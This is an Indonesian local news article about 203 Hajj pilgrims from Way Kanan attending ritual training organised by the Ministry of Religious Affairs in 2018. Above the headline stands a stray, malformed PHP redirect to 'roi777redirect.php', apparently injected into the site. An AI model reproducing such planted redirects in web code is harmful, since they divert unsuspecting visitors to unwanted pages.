header( 'Location: /roi777redirect.php true, 303 );header( 'Location: roi777redirect.php', true, 303 ); Ratusan Jama'ah Calon Haji Way Kanan Ikuti Bimbingan Manasik Haji -
Ratusan Jama’ah Calon Haji Way Kanan Ikuti Bimbingan Manasik Haji

TRANSLAMPUNG.COM, BLAMBANGAN UMPU – Sebanyak 203 Jama’ah Calon Haji Kabupaten Way kanan Mengikuti pembukaan Pembinaan dan Bimbingan Manasik Haji yang di gelar oleh Kantor Kementerian Agama setempat, Acara tersebut berlangsung di Masjid Agung Ashabul Yamin KM2 Kecamatan Blambangan Umpu, Kamis (05/07).

Kepala Kantor Kementerian Agama Kabupaten Way kanan, H. M. Isa mengatakan kegiatan ini bertujuan untuk mewujudkan Jama’ah Calon Haji yang mandiri demi tercapainya haji yang mabrur dan mabruroh.

Jama’ah Calon Haji Yang masuk kuota dalam daftar keberangkatan haji tahun 2018 yakni sebanyak 201 ditambah dua orang petugas TPHD menjadi 203 orang, dengan jumlah calon jama’ah haji laki-laki 94 orang dan calon jama’ah haji perempuan 109 orang.

“Keberangkatan Jama’ah Calon Haji akan di bagi menjadi Dua Kloter, Kloter Pertama yakni Kloter 37 Sebanyak 185 orang akan di brangkatkan dari Way Kanan pada tanggal 1 Agustus, selanjutnya Kloter 57 Sebanyak 18 orang berangkat pada tanggal 12 Agustus tahu 2018,” Ujar Isa.

Isa menambahkan pelaksanaan manasik haji dilaksanakan selama 10 kali pertemuan dengan 2 kali pertemuan di tingkat Kabupaten yaitu pada tanggal 5 Juli dan 12 Juli, sedangkan 8 kali pertemuan dilaksanakan di tingkat Kecamatan tertanggal 6 Juli sampai 11 Juli di Kantor KUA Masing masing kecamatan.

“materi manasik haji terdiri dari pengertian haji dan umroh, proses perjalanan ibadah haji, hak dan kewajiban jama’ah haji, akhlak dan adat istiadat bangsa Arab, ziarah, kesehatan jama’ah haji, praktek ibadah haji dan pelestarian haji mabrur,” Tambahnya.

Isa juga menjelaskan seluruh biaya manasik haji baik di tingkat Kabupaten maupun tingkat Kecamatan dibebankan kepada Pelaksanaan Anggaran Operasional Haji (PAOH) penyelenggara Haji dan Umroh Kementerian Agama Kabupaten Way Kanan.

Sementara itu, Berhalangan hadir, Bupati Way Kanan melalui Asisten lll, Selan, Menyampaikan Sambutan Bupati Way Kanan, dalam Sambutannya Bupati Berpesan Supaya Calon Jama’ah Haji dapat mengikuti Manasik dengan baik dan benar serta memenuhi segala peraturan yang telah di tetapkan.

“saya menghimbau Kepada Bapak ibu supaya selama di tanah suci nanti agar selalu menjaga fisik dan memelihara mental karena ibadah haji memerlukan fisik yang prima,” Pesan Bupati.

Turut hadir dalam acara itu, Kepala Bagian Kesejahteraan, Kepala Kantor Kementerian Agama Way Kanan,Kepala Kantor Kementerian Agama Pringsewu, Drs. M. Yusuf, Kepala Satuan Polisi Pamong Praja, Direktur RSUD ZA Pagar Alam,Ketua KUA Blambangan Umpu, unsur Kodim 0427/Wk, unsur Polres Way Kanan dan unsur Dinas Kesehatan. (migo)

News Reporter